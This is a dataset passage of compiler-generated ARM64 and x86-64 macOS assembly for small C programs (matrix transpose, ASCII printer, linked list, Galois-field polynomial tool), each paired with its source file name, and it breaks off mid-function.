subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_22
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_19 Depth=2
ldrsw x9, [sp, #32]
sub x8, x29, #72
add x8, x8, x9, lsl #4
ldrsw x9, [sp, #28]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_19 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_19
LBB0_22: ; in Loop: Header=BB0_17 Depth=1
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_17 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_17
LBB0_24:
str wzr, [sp, #32]
b LBB0_25
LBB0_25: ; =>This Loop Header: Depth=1
; Child Loop BB0_27 Depth 2
ldr w8, [sp, #32]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_32
b LBB0_26
LBB0_26: ; in Loop: Header=BB0_25 Depth=1
str wzr, [sp, #28]
b LBB0_27
LBB0_27: ; Parent Loop BB0_25 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #28]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_30
b LBB0_28
LBB0_28: ; in Loop: Header=BB0_27 Depth=2
ldrsw x9, [sp, #32]
add x8, sp, #40
add x8, x8, x9, lsl #4
ldrsw x9, [sp, #28]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_29
LBB0_29: ; in Loop: Header=BB0_27 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_27
LBB0_30: ; in Loop: Header=BB0_25 Depth=1
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_25 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_25
LBB0_32:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_34
b LBB0_33
LBB0_33:
bl ___stack_chk_fail
LBB0_34:
mov w0, #0
ldp x29, x30, [sp, #176] ; 16-byte Folded Reload
add sp, sp, #192
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\n\nLendo a matriz e mostrando sua transposta \n"
l_.str.1: ; @.str.1
.asciz "\nEntre com o elemento da linha %d e coluna %d: "
l_.str.2: ; @.str.2
.asciz "%d"
l_.str.3: ; @.str.3
.asciz "%5d "
l_.str.4: ; @.str.4
.asciz "\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $160, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -148(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -152(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
cmpl $4, -152(%rbp)
jge LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -156(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $4, -156(%rbp)
jge LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movl -152(%rbp), %esi
movl -156(%rbp), %edx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movslq -152(%rbp), %rax
leaq -80(%rbp), %rsi
shlq $4, %rax
addq %rax, %rsi
movslq -156(%rbp), %rax
shlq $2, %rax
addq %rax, %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -156(%rbp), %eax
addl $1, %eax
movl %eax, -156(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_7
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movl -152(%rbp), %eax
addl $1, %eax
movl %eax, -152(%rbp)
jmp LBB0_1
LBB0_8:
movl $0, -152(%rbp)
LBB0_9: ## =>This Loop Header: Depth=1
## Child Loop BB0_11 Depth 2
cmpl $4, -152(%rbp)
jge LBB0_16
## %bb.10: ## in Loop: Header=BB0_9 Depth=1
movl $0, -156(%rbp)
LBB0_11: ## Parent Loop BB0_9 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $4, -156(%rbp)
jge LBB0_14
## %bb.12: ## in Loop: Header=BB0_11 Depth=2
movslq -152(%rbp), %rcx
leaq -80(%rbp), %rax
shlq $4, %rcx
addq %rcx, %rax
movslq -156(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movslq -156(%rbp), %rcx
leaq -144(%rbp), %rax
shlq $4, %rcx
addq %rcx, %rax
movslq -152(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
## %bb.13: ## in Loop: Header=BB0_11 Depth=2
movl -156(%rbp), %eax
addl $1, %eax
movl %eax, -156(%rbp)
jmp LBB0_11
LBB0_14: ## in Loop: Header=BB0_9 Depth=1
jmp LBB0_15
LBB0_15: ## in Loop: Header=BB0_9 Depth=1
movl -152(%rbp), %eax
addl $1, %eax
movl %eax, -152(%rbp)
jmp LBB0_9
LBB0_16:
movl $0, -152(%rbp)
LBB0_17: ## =>This Loop Header: Depth=1
## Child Loop BB0_19 Depth 2
cmpl $4, -152(%rbp)
jge LBB0_24
## %bb.18: ## in Loop: Header=BB0_17 Depth=1
movl $0, -156(%rbp)
LBB0_19: ## Parent Loop BB0_17 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $4, -156(%rbp)
jge LBB0_22
## %bb.20: ## in Loop: Header=BB0_19 Depth=2
movslq -152(%rbp), %rcx
leaq -80(%rbp), %rax
shlq $4, %rcx
addq %rcx, %rax
movslq -156(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
## %bb.21: ## in Loop: Header=BB0_19 Depth=2
movl -156(%rbp), %eax
addl $1, %eax
movl %eax, -156(%rbp)
jmp LBB0_19
LBB0_22: ## in Loop: Header=BB0_17 Depth=1
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
## %bb.23: ## in Loop: Header=BB0_17 Depth=1
movl -152(%rbp), %eax
addl $1, %eax
movl %eax, -152(%rbp)
jmp LBB0_17
LBB0_24:
movl $0, -152(%rbp)
LBB0_25: ## =>This Loop Header: Depth=1
## Child Loop BB0_27 Depth 2
cmpl $4, -152(%rbp)
jge LBB0_32
## %bb.26: ## in Loop: Header=BB0_25 Depth=1
movl $0, -156(%rbp)
LBB0_27: ## Parent Loop BB0_25 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $4, -156(%rbp)
jge LBB0_30
## %bb.28: ## in Loop: Header=BB0_27 Depth=2
movslq -152(%rbp), %rcx
leaq -144(%rbp), %rax
shlq $4, %rcx
addq %rcx, %rax
movslq -156(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
## %bb.29: ## in Loop: Header=BB0_27 Depth=2
movl -156(%rbp), %eax
addl $1, %eax
movl %eax, -156(%rbp)
jmp LBB0_27
LBB0_30: ## in Loop: Header=BB0_25 Depth=1
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
## %bb.31: ## in Loop: Header=BB0_25 Depth=1
movl -152(%rbp), %eax
addl $1, %eax
movl %eax, -152(%rbp)
jmp LBB0_25
LBB0_32:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_34
## %bb.33:
xorl %eax, %eax
addq $160, %rsp
popq %rbp
retq
LBB0_34:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\n\nLendo a matriz e mostrando sua transposta \n"
L_.str.1: ## @.str.1
.asciz "\nEntre com o elemento da linha %d e coluna %d: "
L_.str.2: ## @.str.2
.asciz "%d"
L_.str.3: ## @.str.3
.asciz "%5d "
L_.str.4: ## @.str.4
.asciz "\n"
.subsections_via_symbols
| the_stack_data/32950787.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
stur w8, [x29, #-12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #5
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldursb w11, [x29, #-5]
ldursb w10, [x29, #-5]
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldur w0, [x29, #-12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\350\257\267\350\276\223\345\205\245\344\270\200\344\270\252\345\255\227\347\254\246\357\274\232"
l_.str.1: ; @.str.1
.asciz "%c"
l_.str.2: ; @.str.2
.asciz "%c \347\232\204 ASCII \347\240\201\344\270\272 %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -5(%rbp), %rsi
movb $0, %al
callq _scanf
movsbl -5(%rbp), %esi
movsbl -5(%rbp), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\350\257\267\350\276\223\345\205\245\344\270\200\344\270\252\345\255\227\347\254\246\357\274\232"
L_.str.1: ## @.str.1
.asciz "%c"
L_.str.2: ## @.str.2
.asciz "%c \347\232\204 ASCII \347\240\201\344\270\272 %d\n"
.subsections_via_symbols
| the_stack_data/200143715.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _construct_3_strs ; -- Begin function construct_3_strs
.p2align 2
_construct_3_strs: ; @construct_3_strs
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov x0, #16
str x0, [sp] ; 8-byte Folded Spill
bl _malloc
mov x8, x0
ldr x0, [sp] ; 8-byte Folded Reload
stur x8, [x29, #-8]
bl _malloc
mov x8, x0
ldr x0, [sp] ; 8-byte Folded Reload
str x8, [sp, #16]
bl _malloc
mov x8, x0
ldr x0, [sp] ; 8-byte Folded Reload
str x8, [sp, #8]
bl _malloc
mov x8, x0
ldr x0, [sp] ; 8-byte Folded Reload
ldur x9, [x29, #-8]
str x8, [x9]
bl _malloc
mov x8, x0
ldr x0, [sp] ; 8-byte Folded Reload
ldr x9, [sp, #16]
str x8, [x9]
bl _malloc
ldr x8, [sp, #8]
str x0, [x8]
ldur x9, [x29, #-8]
adrp x8, l_.str@PAGE
add x8, x8, l_.str@PAGEOFF
str x8, [x9]
ldr x9, [sp, #16]
adrp x8, l_.str.1@PAGE
add x8, x8, l_.str.1@PAGEOFF
str x8, [x9]
ldr x9, [sp, #8]
adrp x8, l_.str.2@PAGE
add x8, x8, l_.str.2@PAGEOFF
str x8, [x9]
ldr x8, [sp, #16]
ldur x9, [x29, #-8]
str x8, [x9, #8]
ldr x8, [sp, #8]
ldr x9, [sp, #16]
str x8, [x9, #8]
ldur x8, [x29, #-8]
ldr x9, [sp, #8]
str x8, [x9, #8]
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
str x1, [sp, #16]
bl _construct_3_strs
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _dump_all
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _dump_all ; -- Begin function dump_all
.p2align 2
_dump_all: ; @dump_all
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
ldur x8, [x29, #-16]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
str x8, [sp, #24]
ldr x8, [sp, #24]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
ldr x8, [sp, #24]
ldr x8, [x8, #8]
str x8, [sp, #16]
ldr x8, [sp, #16]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
ldr x8, [sp, #16]
ldr x8, [x8, #8]
ldur x9, [x29, #-16]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
mov w8, #-1
stur w8, [x29, #-4]
b LBB2_3
LBB2_2:
stur wzr, [x29, #-4]
b LBB2_3
LBB2_3:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "CS232"
l_.str.1: ; @.str.1
.asciz "is"
l_.str.2: ; @.str.2
.asciz "awesome"
l_.str.3: ; @.str.3
.asciz "x -> %s"
l_.str.4: ; @.str.4
.asciz " %s"
l_.str.5: ; @.str.5
.asciz " %s\n"
l_.str.6: ; @.str.6
.asciz "failed"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _construct_3_strs ## -- Begin function construct_3_strs
.p2align 4, 0x90
_construct_3_strs: ## @construct_3_strs
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $16, %edi
callq _malloc
movq %rax, -8(%rbp)
movl $16, %edi
callq _malloc
movq %rax, -16(%rbp)
movl $16, %edi
callq _malloc
movq %rax, -24(%rbp)
movl $16, %edi
callq _malloc
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
movl $16, %edi
callq _malloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq %rcx, (%rax)
movl $16, %edi
callq _malloc
movq %rax, %rcx
movq -24(%rbp), %rax
movq %rcx, (%rax)
movq -8(%rbp), %rax
leaq L_.str(%rip), %rcx
movq %rcx, (%rax)
movq -16(%rbp), %rax
leaq L_.str.1(%rip), %rcx
movq %rcx, (%rax)
movq -24(%rbp), %rax
leaq L_.str.2(%rip), %rcx
movq %rcx, (%rax)
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -8(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, 8(%rax)
movq -8(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
callq _construct_3_strs
movq %rax, -24(%rbp)
movq -24(%rbp), %rdi
callq _dump_all
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _dump_all ## -- Begin function dump_all
.p2align 4, 0x90
_dump_all: ## @dump_all
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
movq -16(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -32(%rbp)
movq -32(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
movq -32(%rbp), %rax
movq 8(%rax), %rax
cmpq -16(%rbp), %rax
je LBB2_2
## %bb.1:
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
movl $-1, -4(%rbp)
jmp LBB2_3
LBB2_2:
movl $0, -4(%rbp)
LBB2_3:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "CS232"
L_.str.1: ## @.str.1
.asciz "is"
L_.str.2: ## @.str.2
.asciz "awesome"
L_.str.3: ## @.str.3
.asciz "x -> %s"
L_.str.4: ## @.str.4
.asciz " %s"
L_.str.5: ## @.str.5
.asciz " %s\n"
L_.str.6: ## @.str.6
.asciz "failed"
.subsections_via_symbols
| the_stack_data/51473.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
str wzr, [sp, #20]
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur x8, [x29, #-16]
ldr x0, [x8]
bl _usage
mov w8, #1
stur w8, [x29, #-4]
b LBB0_22
LBB0_2:
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _strcasecmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
bl _atoi
bl _poly_search
stur w0, [x29, #-4]
b LBB0_22
LBB0_4:
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
add x1, sp, #24
bl _parse_poly
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
mov w8, #-1
stur w8, [x29, #-4]
b LBB0_22
LBB0_6:
ldr x0, [sp, #24]
bl _gf_init
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
mov w8, #-1
stur w8, [x29, #-4]
b LBB0_22
LBB0_8:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _strcasecmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9:
adrp x8, _gf_exp@PAGE
ldr x0, [x8, _gf_exp@PAGEOFF]
bl _gf_dump
b LBB0_21
LBB0_10:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _strcasecmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11:
adrp x8, _gf_log@PAGE
ldr x0, [x8, _gf_log@PAGEOFF]
bl _gf_dump
b LBB0_20
LBB0_12:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _strcasecmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_18
b LBB0_13
LBB0_13:
ldur w8, [x29, #-8]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14:
ldur x8, [x29, #-16]
ldr x0, [x8]
bl _usage
mov w8, #1
stur w8, [x29, #-4]
b LBB0_22
LBB0_15:
ldur x8, [x29, #-16]
ldr x0, [x8, #24]
bl _atoi
and w0, w0, #0xffff
add x1, sp, #8
bl _bch_generator
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_17
b LBB0_16
LBB0_16:
mov w8, #-1
str w8, [sp, #20]
b LBB0_17
LBB0_17:
b LBB0_19
LBB0_18:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
mov w8, #-1
str w8, [sp, #20]
b LBB0_19
LBB0_19:
b LBB0_20
LBB0_20:
b LBB0_21
LBB0_21:
bl _gf_exit
ldr w8, [sp, #20]
stur w8, [x29, #-4]
b LBB0_22
LBB0_22:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function usage
_usage: ; @usage
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x12, [x29, #-8]
ldur x11, [x29, #-8]
ldur x10, [x29, #-8]
ldur x8, [x29, #-8]
mov x9, sp
str x12, [x9]
str x11, [x9, #8]
str x10, [x9, #16]
str x8, [x9, #24]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function poly_search
_poly_search: ; @poly_search
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
ldur w9, [x29, #-4]
mov w8, #1
lsl w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
str x8, [sp]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
ldur w9, [x29, #-4]
; kill: def $x9 killed $w9
lsr x8, x8, x9
subs x8, x8, #1
cset w8, hi
tbnz w8, #0, LBB2_6
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldr x0, [sp]
bl _is_primitive
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB2_4
b LBB2_3
LBB2_3: ; in Loop: Header=BB2_1 Depth=1
ldr x1, [sp]
mov w0, #120
bl _print_poly
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_1 Depth=1
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp]
add x8, x8, #1
str x8, [sp]
b LBB2_1
LBB2_6:
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function parse_poly
_parse_poly: ; @parse_poly
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
str x1, [sp, #24]
str xzr, [sp, #16]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-16]
ldrsb w8, [x8]
subs w8, w8, #48
cset w8, eq
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_3
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-16]
ldrsb w8, [x8]
subs w8, w8, #120
cset w8, eq
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB3_3
LBB3_3: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB3_5
b LBB3_4
LBB3_4: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-16]
add x8, x8, #1
stur x8, [x29, #-16]
b LBB3_1
LBB3_5:
b LBB3_6
LBB3_6: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-16]
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_20
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_6 Depth=1
ldur x8, [x29, #-16]
add x9, x8, #1
stur x9, [x29, #-16]
ldrb w8, [x8]
strb w8, [sp, #15]
ldr x8, [sp, #16]
lsl x8, x8, #4
str x8, [sp, #16]
ldrsb w8, [sp, #15]
subs w8, w8, #48
cset w8, lt
tbnz w8, #0, LBB3_10
b LBB3_8
LBB3_8: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #57
cset w8, gt
tbnz w8, #0, LBB3_10
b LBB3_9
LBB3_9: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w9, w8, #48
; implicit-def: $x8
mov x8, x9
sxtw x9, w8
ldr x8, [sp, #16]
orr x8, x8, x9
str x8, [sp, #16]
b LBB3_19
LBB3_10: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #65
cset w8, lt
tbnz w8, #0, LBB3_13
b LBB3_11
LBB3_11: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #70
cset w8, gt
tbnz w8, #0, LBB3_13
b LBB3_12
LBB3_12: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #65
add w9, w8, #10
; implicit-def: $x8
mov x8, x9
sxtw x9, w8
ldr x8, [sp, #16]
orr x8, x8, x9
str x8, [sp, #16]
b LBB3_18
LBB3_13: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB3_16
b LBB3_14
LBB3_14: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #102
cset w8, gt
tbnz w8, #0, LBB3_16
b LBB3_15
LBB3_15: ; in Loop: Header=BB3_6 Depth=1
ldrsb w8, [sp, #15]
subs w8, w8, #97
add w9, w8, #10
; implicit-def: $x8
mov x8, x9
sxtw x9, w8
ldr x8, [sp, #16]
orr x8, x8, x9
str x8, [sp, #16]
b LBB3_17
LBB3_16:
